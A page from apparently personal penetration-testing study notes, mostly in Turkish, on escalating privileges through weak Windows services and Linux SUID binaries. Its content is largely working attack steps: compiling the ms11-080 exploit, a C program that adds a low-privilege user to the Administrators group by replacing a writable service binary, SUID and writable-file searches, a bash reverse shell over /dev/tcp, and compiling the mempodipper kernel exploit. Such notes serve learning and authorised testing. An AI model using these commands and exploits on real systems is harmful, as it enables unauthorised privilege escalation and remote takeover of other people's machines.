messy security notes
  • security is an illision
  • Useful Blog Links
  • Windows
    • ad-101
    • MS17-010
    • SMB
    • Post Exploitation Tricks
    • DCOM/RPC
    • Basic Commands
    • SMB Enumeration
  • Linux
    • SUID Set Edilmiş servicectl Abuse Etme
    • sudoers dosyası bozulursa?
    • SSH Welcome Message and Banner
    • pkexec ve pkttyagent
    • vipw , vigr , visudo
    • IP Forwarding
    • İki NIC Arasında Port Yönlendirme
    • tasksel
    • LAMP
    • Find All SUID Bit
    • Linux Operatorler
    • IFS
    • Ssh Public Key Tricks
    • Local & Remote Port Forwarding
    • Linux Priv Esc
    • Static IP
  • POST EXPLOITATION
    • from external network to domain admin
    • post exp 2
  • OSCP
  • Temel Komutlar ve Araçlar
  • Zayıf Servisler
  • Örnek Bir Senaryo
  • Parola Saldırıları
  • ms17-010 python exploit
  • Full Interactive Shell
  • Notes*
  • Apache James Server 2.3.2 Exploit
  • windows exploit suggester
  • FreeBsd and Some PHP tricks
  • fundamental blog
  • Metasoloit & Meterpreter & msfvenom
  • at-tftp server 1.9
  • Tunneling and Forwarding
  • Common Exploits
  • Windows Servisler
  • Execute process as another user
  • Teorik
    • Authentication and Authorization
    • Kullanıcı Hesap Türleri ve Hakları
    • Kerberos
  • SYSTEM
    • Apache2
    • Bind9 Log
    • apache - basic auth - proxy
  • Buffer Overflow - BOF
    • BOF - Stack Based
    • BoF Links
  • BASH SCRIPTING
    • Samples
  • keepnote
  • Docker
    • Docker
  • Misc
    • 50-cloud-init.yaml
Powered by GitBook
On this page
  • Windows
  • Seneryo 1
  • Simple Command
  • Linux
  • Find SUID Bits

Was this helpful?

Zayıf Servisler

Zayıf Servislerden Kaynaklı Hak ve Yetki Yükseltme Saldırıları

Windows

Seneryo 1

ms11-080 exploiti indiridikten sonra .exe formatına dönüştürmek için aşağıdaki kod kullanılmalıdır. Elde edilen exe dosyası hedef makinede çalıştırıldıktan sonra SYSTEM haklarına ulaşmış olur.

# python pyinstaller.py --onefile ms11-080.py

Simple Command

win> move source dest
win> copy source dest

3. parti uygulamaların kurulduklarında beraberinde servisleri de sisteme yüklenir. Yüklenilen 3. parti bir uygulamanın servisine "services.msc" üzerinden ulaşılabilir. Çalışan servisin ".exe" dosyası bulunduktan sonra bu dosyayı çalıştırmaya hak ve yetkisi olan kullanıcıları listelemek için aşağıdaki komut kullanılmalıdır.

win> icacls.exe <exe_name.exe>

Yukarıdaki komut sonucunda ilgili exe üzerinde hak ve yetkileri olan kullanıcılar listenir. Bu kullanıcılar arasında oturum elde edilmiş düşük hak ve yetkideki kullanıcı olmasına dikkat edilir. Ayrıca "Everyone" kullanıcı var ise buna ait yetkilere de bakılmalıdır. Elde edilen çıktıda parantez içerisinde yer alan bazı kısaltmaların açıklamaları aşağıdadır.

F : Full Access D : Delete R : Read W : Write

#include <stdlib.h>

int main(){
    int i;
    i = system ("net localgroup Administrators lowpriv /add");
    return 0;
}

yukarıda yer alan komutu linuxda windows platformuna uygun derlemek için # i586-mingw32msvc-gcc exploit.c -o exploit.exe veya # i686-w64-mingw32-gcc exploit.c -o exploit.exe olarak derlenir.

Eğer hata alınırsa; i686-w64-mingw32-gcc afd.sys.c -o afdsys.exe -m32 -lws2_32 komutuyla derleme işlemi yapılabilir.

Linux

Find SUID Bits

# find / -perm -u=s -type f 2>/dev/null
# find directory -user root -perm -4000 -exec ls -ldb {} \; >/tmp/filename  
# find / -perm -2 ! -type l -ls 2 > /dev/null (List writable file)

#Find SUID
find / -perm -u=s -type f 2>/dev/null

#Find GUID
find / -perm -g=s -type f 2>/dev/null

Bash Reverse Shell

# bash -i >& /dev/tcp/IP/PORT 0>&1

Kernel Exploit

# mempodipper - Linux root exploit >=2.6.39 x64 and x86
# gcc exploit.c -o exploit
PreviousTemel Komutlar ve AraçlarNextÖrnek Bir Senaryo

Last updated 5 years ago

Was this helpful?